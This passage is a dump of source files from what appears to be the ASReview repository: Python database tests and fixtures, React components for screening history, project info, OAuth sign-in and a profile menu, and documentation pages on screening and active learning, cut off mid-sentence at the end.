DB.session.commit()\n assert crud.count_invitations() == 1\n DB.session.delete(project)\n DB.session.commit()\n assert crud.count_projects() == 0\n assert crud.count_invitations() == 0\n\n\n# deleting a project will remove collaboration links\ndef test_project_removal_collaborations(user):\n project = crud.create_project(DB, user, Project(project_id=\"my-project\"))\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 1\n assert crud.count_collaborations() == 0\n # invite\n project.collaborators.append(user2)\n DB.session.commit()\n assert crud.count_collaborations() == 1\n DB.session.delete(project)\n DB.session.commit()\n assert crud.count_projects() == 0\n assert crud.count_collaborations() == 0\n\n\n# #############\n# PROPERTIES\n# #############\n\n\n# test getting a user from project\ndef test_getting_user_from_project(user):\n project_id = \"my-project\"\n project = Project(project_id=project_id)\n crud.create_project(DB, user, project)\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n assert project.owner == user\n\n\n# test project_folder\ndef test_project_folder(user):\n project_id = \"my-project\"\n crud.create_project(DB, user, Project(project_id=project_id))\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n assert project.folder == project_id\n\n\n# test project_path\ndef test_project_path(user):\n project_id = \"my-project\"\n crud.create_project(DB, user, Project(project_id=project_id))\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n assert project.project_path == Path(asreview_path() / project_id)\n\n\n# test pending invites\ndef test_pending_invites(user):\n project = crud.create_project(DB, user, Project(project_id=\"my-project\"))\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 1\n # invite\n project.pending_invitations.append(user2)\n DB.session.commit()\n # fresh object\n project = crud.last_project()\n # asserts\n assert user2 in project.pending_invitations\n\n\n# test collaboration\ndef test_collaboration(user):\n project = crud.create_project(DB, user, Project(project_id=\"my-project\"))\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 1\n assert crud.count_collaborations() == 0\n # invite\n project.collaborators.append(user2)\n DB.session.commit()\n assert crud.count_collaborations() == 1\n # start with a fresh object\n project = crud.last_project()\n assert user2 in project.collaborators\n" }, { "alpha_fraction": 0.5322014093399048, "alphanum_fraction": 0.5333723425865173, "avg_line_length": 27.46666717529297, "blob_id": "48704502f8ac20d695eb89a39ac62c5ecf19ed75", "content_id": "158736fcd1d2e88d4fb139aa03554825947d62ed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1708, "license_type": "permissive", "max_line_length": 75, "num_lines": 60, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/HistoryPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Divider, Fade } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { PageHeader } from \"../../Components\";\nimport { Filter, LabelChip, LabeledRecord } from \"../HistoryComponents\";\n\nconst PREFIX = \"HistoryPage\";\n\nconst classes = {\n cardWrapper: `${PREFIX}-card-wrapper`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.cardWrapper}`]: {\n paddingTop: 32,\n },\n}));\n\nconst HistoryPage = (props) => {\n return (\n <Root aria-label=\"history page\">\n <Fade in>\n <Box>\n <PageHeader header=\"History\" mobileScreen={props.mobileScreen} />\n <Box\n className=\"main-page-sticky-header-wrapper\"\n sx={{ background: (theme) => theme.palette.background.paper }}\n >\n <LabelChip\n mobileScreen={props.mobileScreen}\n label={props.label}\n setLabel={props.setLabel}\n />\n <Divider />\n <Filter\n mobileScreen={props.mobileScreen}\n filterQuery={props.filterQuery}\n setFilterQuery={props.setFilterQuery}\n />\n <Divider />\n </Box>\n <Box className=\"main-page-body-wrapper\">\n <Box className={`${classes.cardWrapper} main-page-body`}>\n <LabeledRecord\n label={props.label}\n filterQuery={props.filterQuery}\n isSimulating={props.isSimulating}\n mobileScreen={props.mobileScreen}\n mode={props.mode}\n />\n </Box>\n </Box>\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default HistoryPage;\n" }, { "alpha_fraction": 0.6750811338424683, "alphanum_fraction": 0.6855391263961792, "avg_line_length": 34.5512809753418, "blob_id": "4d8c90638e024bae580d63ffd2424521ebf8caeb", "content_id": "678ea59f1d6feb6a207a9ebc3cfa8a9f381c6ee6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2773, "license_type": "permissive", "max_line_length": 68, "num_lines": 78, "path": "/asreview/webapp/tests/test_api/conftest.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import pytest\n\nimport asreview.webapp.tests.utils.api_utils as au\nfrom asreview.project import get_projects\nfrom asreview.webapp import DB\nfrom asreview.webapp.tests.utils import crud\nfrom asreview.webapp.tests.utils.config_parser import get_user\n\n\[email protected](params=[\"client_auth\", \"client_no_auth\"])\ndef setup(request):\n \"\"\"Setup and teardown fixture that will run each test with\n an authenticated version and unauthenticated version of the\n app. In the authenticated version the fixture yields a Flask\n client, a signed-in user plus a project belongoing to this user.\n In the unauthenticated version, the fixture yields a Flask\n client, and a project.\"\"\"\n # get the client\n client = request.getfixturevalue(request.param)\n # provide a project name\n project_name = \"project_name\"\n if request.param == \"client_auth\":\n # create, signup and signin users\n user1 = au.create_and_signin_user(client, 1)\n # create a project for this logged in user\n au.create_project(client, project_name)\n # receive project\n project = user1.projects[0]\n else:\n # this has to be created to match the authenticated\n # version of this fixture\n user1 = None\n # create a project\n au.create_project(client, project_name)\n # get all project\n project = get_projects()[0]\n yield client, user1, project\n if request.param == \"client_auth\":\n # cleanup database and asreview_path\n crud.delete_everything(DB)\n\n\[email protected](\n params=[\n \"client_auth\",\n \"client_auth_no_creation\",\n \"client_auth_verified\",\n \"client_no_auth\",\n ]\n)\ndef setup_all_clients(request):\n \"\"\"This fixture provides 4 different Flask client (authenticated\n and unauthenticated) for every test that uses it.\"\"\"\n client = request.getfixturevalue(request.param)\n yield client\n\n\[email protected]()\ndef setup_auth(client_auth):\n \"\"\"This fixtures yields a Flask client for an authenticated\n app, 3 user accounts (first user is signed in) and a project\n belonging to the first user.\"\"\"\n # create, signup and signin users\n user1 = au.create_and_signin_user(client_auth, 1)\n user2 = get_user(2)\n user3 = get_user(3)\n # signup user 2\n au.signup_user(client_auth, user2)\n au.signup_user(client_auth, user3)\n # get users 2 and 3 from DB\n user2 = crud.get_user_by_identifier(user2.identifier)\n user3 = crud.get_user_by_identifier(user3.identifier)\n # create a project for this logged in user\n project_name = \"project_name\"\n au.create_project(client_auth, project_name)\n yield client_auth, user1, user2, user3, user1.projects[0]\n # cleanup database and asreview_path\n crud.delete_everything(DB)\n" }, { "alpha_fraction": 0.49343785643577576, "alphanum_fraction": 0.49562522768974304, "avg_line_length": 28.654054641723633, "blob_id": "f376bb7372b25ed95807c5402a7c62a935de9bd4", "content_id": "43b4166efca5fab61bdf5248f8c7c7c76753e7d1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5486, "license_type": "permissive", "max_line_length": 84, "num_lines": 185, "path": "/asreview/webapp/src/ProjectComponents/ProjectInfoForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport { useParams } from \"react-router-dom\";\nimport {\n Box,\n CircularProgress,\n Stack,\n TextField,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../Components\";\nimport { ProjectModeSelect } from \"../ProjectComponents\";\nimport { MouseOverPopover } from \"../StyledComponents/StyledPopover.js\";\nimport { TypographySubtitle1Medium } from \"../StyledComponents/StyledTypography.js\";\nimport { mapStateToProps } from \"../globals.js\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst ProjectInfoForm = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const fetchInfoState = queryClient.getQueryState([\n \"fetchInfo\",\n { project_id: props.project_id },\n ]);\n\n const isProjectSetup = () => {\n return !project_id;\n };\n\n const onFocus = () => {\n if (!isProjectSetup()) {\n // do nothing\n } else {\n props.setTextFieldFocused(true);\n }\n };\n\n const onBlur = () => {\n if (!isProjectSetup()) {\n // do nothing\n } else {\n props.setTextFieldFocused(false);\n }\n };\n\n const handleInfoChange = (event) => {\n if (!isProjectSetup()) {\n props.setInfo({\n ...props.info,\n [event.target.name]: event.target.value,\n });\n if (event.target.name === \"title\" && !event.target.value) {\n props.setDisableSaveButton(true);\n } else if (props.info?.title) {\n props.setDisableSaveButton(false);\n } else {\n // do nothing\n }\n props.setDisableUndoButton(false);\n } else {\n props.handleInfoChange(event);\n }\n };\n\n const refetchInfo = () => {\n queryClient.resetQueries(\"fetchInfo\");\n };\n\n return (\n <Root\n style={{\n width: !props.mobileScreen && !isProjectSetup() ? \"60%\" : \"100%\",\n }}\n >\n <Stack spacing={3}>\n <Box>\n {isProjectSetup() && (\n <Typography variant=\"h6\">Project information</Typography>\n )}\n {!isProjectSetup() && (\n <TypographySubtitle1Medium>\n Project information\n </TypographySubtitle1Medium>\n )}\n </Box>\n {isProjectSetup() && fetchInfoState?.isFetching && (\n <Box className=\"main-page-body-wrapper\">\n <CircularProgress />\n </Box>\n )}\n {((isProjectSetup() &&\n fetchInfoState.status !== \"error\" &&\n !fetchInfoState.isFetching) ||\n !isProjectSetup()) && (\n <Box component=\"form\" noValidate autoComplete=\"off\">\n <Stack direction=\"column\" spacing={3}>\n {!isProjectSetup() && (\n <MouseOverPopover title=\"Select mode when creating a new project\">\n <ProjectModeSelect\n disableModeSelect\n mode={props.info?.mode}\n handleMode={handleInfoChange}\n onBlur={onBlur}\n onFocus={onFocus}\n />\n </MouseOverPopover>\n )}\n {isProjectSetup() && (\n <ProjectModeSelect\n datasetAdded={props.datasetAdded}\n mode={props.info?.mode}\n handleMode={handleInfoChange}\n onBlur={onBlur}\n onFocus={onFocus}\n />\n )}\n <TextField\n autoFocus\n error={props.isMutateInfoError}\n fullWidth\n helperText={props.mutateInfoError?.message}\n id=\"project-title\"\n inputProps={{\n onFocus: () => onFocus(),\n onBlur: () => onBlur(),\n }}\n InputLabelProps={{\n required: false,\n }}\n label=\"Title (required)\"\n name=\"title\"\n onChange={handleInfoChange}\n required\n value={props.info?.title}\n />\n <TextField\n fullWidth\n id=\"project-author\"\n inputProps={{\n onFocus: () => onFocus(),\n onBlur: () => onBlur(),\n }}\n label=\"Author(s)\"\n name=\"authors\"\n onChange={handleInfoChange}\n value={props.info?.authors}\n />\n <TextField\n fullWidth\n id=\"project-description\"\n inputProps={{\n onFocus: () => onFocus(),\n onBlur: () => onBlur(),\n }}\n label=\"Description\"\n multiline\n minRows={8}\n name=\"description\"\n onChange={handleInfoChange}\n value={props.info?.description}\n />\n </Stack>\n </Box>\n )}\n {isProjectSetup() && fetchInfoState.status === \"error\" && (\n <InlineErrorHandler\n message={fetchInfoState.error?.message}\n refetch={refetchInfo}\n button\n />\n )}\n {props.isDeleteProjectError && (\n <InlineErrorHandler message={props.deleteProjectError?.message} />\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(ProjectInfoForm);\n" }, { "alpha_fraction": 0.5631298422813416, "alphanum_fraction": 0.5655009150505066, "avg_line_length": 28.086206436157227, "blob_id": "7f337184587dc13c4fb5556d33a67d7482d93516", "content_id": "d5230c55c2e335c9ab97daca87361196415b3545", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3374, "license_type": "permissive", "max_line_length": 84, "num_lines": 116, "path": "/asreview/webapp/src/Components/SignInOAuth.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "// The business logic of this component comes from the\n// following URL: https://tasoskakour.com/blog/react-use-oauth2\n\nimport * as React from \"react\";\nimport { useNavigate } from \"react-router-dom\";\nimport { IconButton, Stack, Typography } from \"@mui/material\";\nimport { GitHub, Google } from \"@mui/icons-material\";\nimport { Orcid } from \"../icons\";\nimport AuthAPI from \"../api/AuthAPI\";\nimport useAuth from \"../hooks/useAuth\";\nimport { InlineErrorHandler } from \".\";\nimport OauthPopup from \"react-oauth-popup\";\n\nconst POPUP_HEIGHT = 700;\nconst POPUP_WIDTH = 600;\n\nconst redirect_uri = `${window.location.origin}/oauth_callback`;\n\nconst generateOAuthUrl = (config) => {\n return (\n `${config.authorization_url}?response_type=code&client_id=${config.client_id}` +\n `&redirect_uri=${redirect_uri}&scope=${config.scope}&state=${config.state}`\n );\n};\n\nconst SignInOauth = (props) => {\n const classes = props.classes;\n const oAuthData = props.oAuthData;\n const oAuthServices = oAuthData.services;\n const { setAuth } = useAuth();\n const navigate = useNavigate();\n\n const [errorMessage, setErrorMessage] = React.useState(\"\");\n\n const handleSignin = (code, provider) => {\n let message = \"\";\n\n const payload = {\n provider: provider,\n code: code,\n redirect_uri: redirect_uri,\n };\n\n AuthAPI.oAuthCallback(payload)\n .then((data) => {\n if (data.logged_in) {\n setAuth({\n logged_in: data.logged_in,\n name: data.name,\n id: data.id,\n });\n // Authentication was successful, do we have\n // to go to the profile page (if this is the first\n // time), or do we go to projects\n if (Boolean(data?.account_created)) {\n navigate(\"/profile?first_time=true\");\n } else {\n navigate(\"/projects\");\n }\n } else {\n message = \"Backend could not log you in.\";\n console.error(message);\n setErrorMessage(message);\n }\n })\n .catch((err) => {\n message = \"Did not receive OAuth data from backend\";\n console.error(message, err);\n setErrorMessage(message);\n });\n };\n\n const getIcon = (service) => {\n switch (service) {\n case \"google\":\n return <Google />;\n case \"github\":\n return <GitHub />;\n case \"orcid\":\n return <Orcid />;\n default:\n return service;\n }\n };\n\n return (\n <>\n <Stack className={classes.button} direction=\"row\">\n <Typography variant=\"body1\">Or sign in with:</Typography>\n {Object.keys(oAuthServices).map((provider) => {\n let config = oAuthServices[provider];\n return (\n <OauthPopup\n url={generateOAuthUrl(config)}\n onCode={(code) => handleSignin(code, provider)}\n onClose={(data) => true}\n key={provider}\n width={POPUP_WIDTH}\n height={POPUP_HEIGHT}\n >\n <IconButton\n onClick={() => \"true\"} //handleOauthSignIn(provider)}\n key={provider}\n >\n {getIcon(provider)}\n </IconButton>\n </OauthPopup>\n );\n })}\n </Stack>\n {Boolean(errorMessage) && <InlineErrorHandler message={errorMessage} />}\n </>\n );\n};\n\nexport default SignInOauth;\n" }, { "alpha_fraction": 0.6945466995239258, "alphanum_fraction": 0.6977249979972839, "avg_line_length": 32.027626037597656, "blob_id": "aad1f2010897994ad2fad4bdbd3976ffb53857a5", "content_id": "3cce9b33bedb9fee722d8fe13327aece79af166c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5978, "license_type": "permissive", "max_line_length": 125, "num_lines": 181, "path": "/docs/source/screening.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Screening\n=========\n\n.. note::\n\n Only for Oracle and Exploration projects. Read more about :ref:`project_create:Project modes`.\n\n\nIntroduction\n------------\n\nAs soon as your project is initiated, you can start reviewing. Click on\n*Review* in the left menu if your project is not on the review page yet.\nASReview LAB presents you a title and abstract to screen and label.\n\nYou are asked to make a decision: relevant or irrelevant?\n\n.. figure:: ../images/project_screening.png\n :alt: ASReview Screening\n\n\nScreening in Oracle mode\n~~~~~~~~~~~~~~~~~~~~~~~~\n\nIn the Oracle mode, unlabeled records are presented to you. Depending on the\nselected strategy it is the most likely relevant record (default\nsetting) or based on another:ref:project_create:Query Strategy. \n\nClick on the decision of your choice, and a new record is presented to you. While\nyou review the next record, a new model is being trained. ASReview LAB\ncontinuously improves its understanding of your decisions, constantly updating\nthe underlying ordering of the records.\n\nEach labeling decision of the user starts the training of a new model given\nno model is being trained at that time. When this new model is trained,\nthe unseen records' rank order is updated. Training and labeling occur\nasynchronously. With fast models, a new ranking will probably be available\nbefore the user finishes reading the text. With slower models, training\ncontinues until a new model is trained, and the user can continue screening\nthe next record in line (2nd, 3rd, etc.). Therefore, the record shown to the\nuser can be the one with the highest relevance score of the second last model\nor the highest-ranked as a result of the latest model until a new model is\ntrained. \n\nAs you keep reviewing documents and providing labels, you will probably see\nfewer relevant records. When to stop screening is left to you. See\n:doc:`progress` for more information on progress monitoring and information on\nwhen to stop.\n\n.. tip::\n\n If you are in doubt about your decision, take your time as you are the\n oracle. Based on your input, a new model will be trained, and you do not\n want to confuse the prediction mode. For the model, it may be better to\n consult others, and read the full text (in case of reviewing abstracts of\n scientific papers)\n\nScreening in Exploration mode\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThe Exploration mode is useful for teaching purposes because a blue bar is\ndisplayed on top of the record indicating whether the record has been labeled\nrelevant or irrelevant in the dataset. You can make the same labeling\ndecision without the need to be the oracle. \n\n.. figure:: ../images/project_screening_exploration.png\n :alt: ASReview Screening\n\nAutosave\n--------\n\nYour decisions (and notes) are saved automatically into your ASReview project\nfile. There is no need to press any buttons to save your work anywhere in\nASReview LAB (in fact, there is not even a *save* button).\n\nChange decisions\n----------------\n\nIn some cases, you might want to change your previous decision. The screening\ninterface of ASReview LAB offers two options to change your decision.\n\nUndo last decision\n~~~~~~~~~~~~~~~~~~\n\nYou can return to your previous decision during screening. \n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Label the record displayed in the screen as relevant or irrelevant.\n4. Click on *Undo* (At the bottom right)\n5. Click on *Keep (ir)relevant* or *Convert to (ir)relevant*.\n6. Continue screening.\n\nYou can disable\nthis option in the Settings menu.\n\nScreening history\n~~~~~~~~~~~~~~~~~\n\nAn overview of your decisions made during screening can be found on the\n**History** page. You can change decisions on this page.\n\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Click on History in the menu on the left.\n\n.. figure:: ../images/project_history.png\n :alt: Show project history\n\nChanging decisions on the history page\n\n4. To change a label of a record, click the heart icon. The next iteration of the model will take the new label into account.\n\n\nFull Text\n---------\n\nIf a column with Digital Object Identifiers (DOI) or URLs is available in the\nmetadata of your dataset, ASReview LAB will display the DOI and URL during\nscreening. Most of the time, DOIs point to the full-text of a publication. See\n:doc:`datasets <data>` for more information on including DOI and URL values to\nyour datasets.\n\n.. figure:: ../images/screening_full_text.png\n :alt: Digital Object Identifier (DOI)\n\n\nKeyboard shortcuts\n------------------\n\nASReview LAB supports the use of keyboard shortcuts during screening. The\ntable below lists the available keyboard shortcuts.\n\n\nYou can press a key (or a combination of keys) to label a record as relevant\nor irrelevant, or to return to the previous decision during screening.\nBy default, keyboard shortcuts are disabled.\n\n+-----------------------------+------------------------+\n| Action | Shortcut |\n+=============================+========================+\n| Label record as relevant | **r** or **Shift + r** |\n+-----------------------------+------------------------+\n| Label record as irrelevant | **i** or **Shift + i** |\n+-----------------------------+------------------------+\n| Return to previous decision | **u** or **Shift + u** |\n+-----------------------------+------------------------+\n\n\n.. note::\n\n Keyboard shortcuts are only available when the **Undo** feature has been\n enabled in the Settings (bottom left).\n\n\nDisplay\n-------\n\nDark mode\n~~~~~~~~~\n\nASReview LAB offers the option to customize the screening appearance and functionality.\n\n1. :doc:`start`.\n2. Click on *Settings* (bottom left).\n3. Go to *Display* and toggle the dark mode\n\n.. note::\n Your preference is saved in the browser.\n\n\nFont size\n~~~~~~~~~\n\nYou can make the text on the review screen smaller or larger.\n\n1. :doc:`start`.\n2. Click on *Settings* (bottom left).\n3. Go to *Display* and click on *Font size*.\n4. Slide the slider to the desired font size.\n" }, { "alpha_fraction": 0.7566371560096741, "alphanum_fraction": 0.7566371560096741, "avg_line_length": 27.25, "blob_id": "a5c3e718f6dbbc94af0ba3f3838e5d239c865c97", "content_id": "98887147b972e15b863f1b16c1a3c7169e7c57a1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "permissive", "max_line_length": 81, "num_lines": 16, "path": "/tests/asreview_files/convert_test_state.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\nfrom shutil import rmtree\nfrom zipfile import ZipFile\n\nfrom asreview.state.sql_converter import upgrade_asreview_project_file\n\nold_fp = Path(\"tests\", \"asreview_files\", \"test_state_example_old.asreview\")\nnew_fp = Path(\"tests\", \"asreview_files\", \"test_state_example_converted.asreview\")\n\nif new_fp.exists():\n rmtree(new_fp)\n\nwith ZipFile(old_fp) as zipobj:\n zipobj.extractall(new_fp)\n\nupgrade_asreview_project_file(new_fp)\n" }, { "alpha_fraction": 0.4924698770046234, "alphanum_fraction": 0.4974513351917267, "avg_line_length": 31.821292877197266, "blob_id": "bcc7a789485db2345892e239f764dd8a574f4121", "content_id": "2923b6a2afde32505f528840cf6208a67ee649ea", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8632, "license_type": "permissive", "max_line_length": 87, "num_lines": 263, "path": "/asreview/webapp/src/Components/ProfilePopper.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useDispatch, useSelector } from \"react-redux\";\nimport { useNavigate } from \"react-router-dom\";\nimport { useMutation, useQuery } from \"react-query\";\nimport {\n Avatar,\n Badge,\n Box,\n ButtonBase,\n ClickAwayListener,\n Divider,\n ListItemIcon,\n ListItemText,\n MenuItem,\n MenuList,\n Paper,\n Popper,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport MailIcon from \"@mui/icons-material/Mail\";\nimport { styled } from \"@mui/material/styles\";\nimport { Logout, GroupAdd, Person } from \"@mui/icons-material\";\n\nimport { StyledMenuItem } from \"../StyledComponents/StyledMenuItem\";\nimport { TypographySubtitle1Medium } from \"../StyledComponents/StyledTypography\";\n\nimport { AuthAPI, TeamAPI, ProjectAPI } from \"../api\";\nimport useAuth from \"../hooks/useAuth\";\nimport ElasAvatar from \"../images/ElasAvatar.svg\";\n\nimport { AcceptanceDialog } from \"../ProjectComponents/TeamComponents\";\nimport { useToggle } from \"../hooks/useToggle\";\nimport { setMyProjects } from \"../redux/actions\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst ProfilePopper = (props) => {\n const { auth, setAuth } = useAuth();\n const allowTeams = useSelector((state) => state.allow_teams);\n const navigate = useNavigate();\n\n const [projectInvitations, setProjectInvitations] = React.useState([]);\n const dispatch = useDispatch();\n\n const [onAcceptanceDialog, toggleAcceptanceDialog] = useToggle();\n\n const [anchorEl, setAnchorEl] = React.useState(null);\n const [open, setOpen] = React.useState(false);\n\n useQuery([\"getProjectInvitations\"], () => TeamAPI.getProjectInvitations(), {\n onSuccess: (data) => {\n setProjectInvitations(data[\"invited_for_projects\"] || []);\n },\n onError: (data) => {\n console.log(\"error\", data);\n },\n });\n\n const { mutate } = useMutation(AuthAPI.signout, {\n onSuccess: () => {\n setAuth({});\n },\n });\n\n const handleClick = (event) => {\n setAnchorEl(event.currentTarget);\n setOpen((prev) => !prev);\n };\n\n const handleClickAway = () => {\n setOpen(false);\n };\n\n const handleSignOut = () => {\n mutate();\n };\n\n const openAcceptanceDialog = () => {\n setOpen(false);\n toggleAcceptanceDialog();\n };\n\n const handleProfile = () => {\n setOpen(false);\n navigate(\"/profile\");\n };\n\n const acceptanceHandler = (project) => {\n // Call the API to accept the invitation, if that is successful\n // get list of all projects of this user and refresh the projects\n // list, remove from Dialog\n TeamAPI.acceptInvitation(project.project_id)\n .then((data) => {\n if (data.success) {\n // success, the invite was transformed into a collaboration, get all projects\n ProjectAPI.fetchProjects({})\n .then((data) => {\n if (data.result instanceof Array) {\n // refresh project list\n dispatch(setMyProjects(data.result));\n // remove project from Dialog table\n const newProjectList = projectInvitations.filter(\n (p) => p.id !== project.id,\n );\n setProjectInvitations(newProjectList);\n // close modal if there are no more invitations\n if (newProjectList.length === 0) {\n toggleAcceptanceDialog();\n }\n } else {\n console.log(\"Could not get projects list -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not pull all projects\", err));\n } else {\n console.log(\"Could not reject invitation -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not reject invitation\", err));\n };\n\n const rejectionHandler = (project) => {\n // call API to remove the invitation\n TeamAPI.rejectInvitation(project.project_id)\n .then((data) => {\n if (data.success) {\n // remove project from Dialog table and close if there are\n // no more invitations\n const newProjectList = projectInvitations.filter(\n (p) => p.id !== project.id,\n );\n setProjectInvitations(newProjectList);\n // close modal if there are no more invitations\n if (newProjectList.length === 0) {\n toggleAcceptanceDialog();\n }\n } else {\n console.log(\"Could not reject invitation -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not reject invitation\", err));\n };\n\n return (\n <Root>\n <ClickAwayListener onClickAway={handleClickAway}>\n <Box>\n <Tooltip title=\"Profile\">\n <ButtonBase onClick={handleClick}>\n <Avatar\n alt=\"user\"\n src={ElasAvatar}\n sx={{\n width: !props.mobileScreen ? 32 : 24,\n height: !props.mobileScreen ? 32 : 24,\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.600\" : \"grey.400\",\n }}\n imgProps={{ sx: { p: 1 } }}\n />\n </ButtonBase>\n </Tooltip>\n <Popper\n open={open}\n anchorEl={anchorEl}\n placement=\"bottom-end\"\n sx={{ zIndex: \"tooltip\", mt: \"8px !important\" }}\n >\n <Paper variant=\"outlined\">\n <MenuList>\n <StyledMenuItem>\n <Stack\n direction=\"row\"\n spacing={2}\n sx={{ alignItems: \"center\" }}\n >\n <Avatar\n alt=\"user\"\n src={ElasAvatar}\n sx={{\n width: !props.mobileScreen ? 40 : 32,\n height: !props.mobileScreen ? 40 : 32,\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\"\n ? \"grey.600\"\n : \"grey.400\",\n }}\n imgProps={{ sx: { p: 1 } }}\n />\n <TypographySubtitle1Medium>\n {auth?.name}\n </TypographySubtitle1Medium>\n </Stack>\n </StyledMenuItem>\n <Divider />\n\n <MenuItem onClick={handleProfile}>\n <ListItemIcon>\n <Person fontSize=\"small\" />\n </ListItemIcon>\n <ListItemText disableTypography>\n <Typography variant=\"body2\">Profile</Typography>\n </ListItemText>\n </MenuItem>\n\n {false && allowTeams && (\n <MenuItem onClick={openAcceptanceDialog}>\n <ListItemIcon>\n <GroupAdd fontSize=\"small\" />\n </ListItemIcon>\n <ListItemText disableTypography>\n <Typography variant=\"body2\">\n Collaboration Invites\n {projectInvitations.length > 0 && (\n <Badge\n badgeContent={projectInvitations.length}\n sx={{\n \"& .MuiBadge-badge\": {\n color: \"white\",\n backgroundColor: \"red\",\n fontSize: 11,\n },\n }}\n >\n <MailIcon color=\"action\" fontSize=\"small\" />\n </Badge>\n )}\n </Typography>\n </ListItemText>\n </MenuItem>\n )}\n\n <MenuItem onClick={handleSignOut}>\n <ListItemIcon>\n <Logout fontSize=\"small\" />\n </ListItemIcon>\n <ListItemText disableTypography>\n <Typography variant=\"body2\">Sign out</Typography>\n </ListItemText>\n </MenuItem>\n </MenuList>\n </Paper>\n </Popper>\n </Box>\n </ClickAwayListener>\n\n {allowTeams && (\n <AcceptanceDialog\n open={onAcceptanceDialog}\n onClose={toggleAcceptanceDialog}\n userId={auth.id}\n projectInvitations={projectInvitations}\n handleAcceptance={acceptanceHandler}\n handleRejection={rejectionHandler}\n />\n )}\n </Root>\n );\n};\n\nexport default ProfilePopper;\n" }, { "alpha_fraction": 0.740919828414917, "alphanum_fraction": 0.7476312518119812, "avg_line_length": 39.04743194580078, "blob_id": "c4f95919f2143d5dc086de7af064d0754c1263aa", "content_id": "34e905affb7920033f547c0c93f8ae17018967a4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 10144, "license_type": "permissive", "max_line_length": 242, "num_lines": 253, "path": "/docs/source/about.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Get Started\n===========\n\nWhat is ASReview LAB?\n---------------------\n\nASReview LAB is a free (Libre) open-source machine learning tool for screening\nand systematically labeling a large collection of textual data. It's sometimes\nreferred to as a tool for title and abstract screening in systematic reviews\nor meta-analyses, but it can handle any type of textual data that must be\nscreened systematically, see the paper published in `Nature Machine Intelligence <https://www.nature.com/articles/s42256-020-00287-7>`_. \n\nASReview LAB implements three different options:\n\n- **Oracle:** Screen textual data in interaction with the active learning model. The reviewer is the 'oracle', making the labeling decisions.\n- **Simulation:** Evaluate the performance of active learning models on fully labeled data.\n- **Exploration:** Explore or demonstrate ASReview LAB with a completely labeled dataset. This mode is suitable for teaching purposes.\n\nASReview LAB is one of the products of the `ASReview research project\n<https://asreview.ai/about/>`_ initiated at Utrecht University, which has\ngrown into a vivid community of researchers, users, and developers from\naround the world.\n\n.. youtube:: k-a2SCq-LtA\n\nWhat is active learning?\n------------------------\n\nArtificial Intelligence (AI) and machine learning has allowed the development\nof AI-aided pipelines that assist in finding relevant texts for search tasks.\nA well-established approach to increasing the efficiency\nof screening large amounts of textual data is screening prioritization through\n`Active Learning <https://asreview.ai/blog/active-learning-explained/>`_: a constant\ninteraction between a human who labels records and a machine learning model\nwhich selects the most likely relevant record based on a minimum training\ndataset. The active learning cycle is repeated until the annotator is sufficiently\nconfident they have seen all relevant records. Thus, the machine learning model is\nresponsible for ranking the records and the human provides the labels, this is called\n`Researcher-In-The-Loop (RITL) <https://asreview.ai/blog/active-learning-explained/>`_.\n\nIt allows the screening of large amounts of text in an intelligent\nand time-efficient manner. ASReview LAB, published in Nature Machine\nIntelligence, has shown the benefits of active learning, `reducing up to 95%\n<https://www.nature.com/articles/s42256-020-00287-7>`_ of the required\nscreening time.\n\n\nLabeling workflow with ASReview\n-------------------------------\n\nStart and finish a systematic labeling process 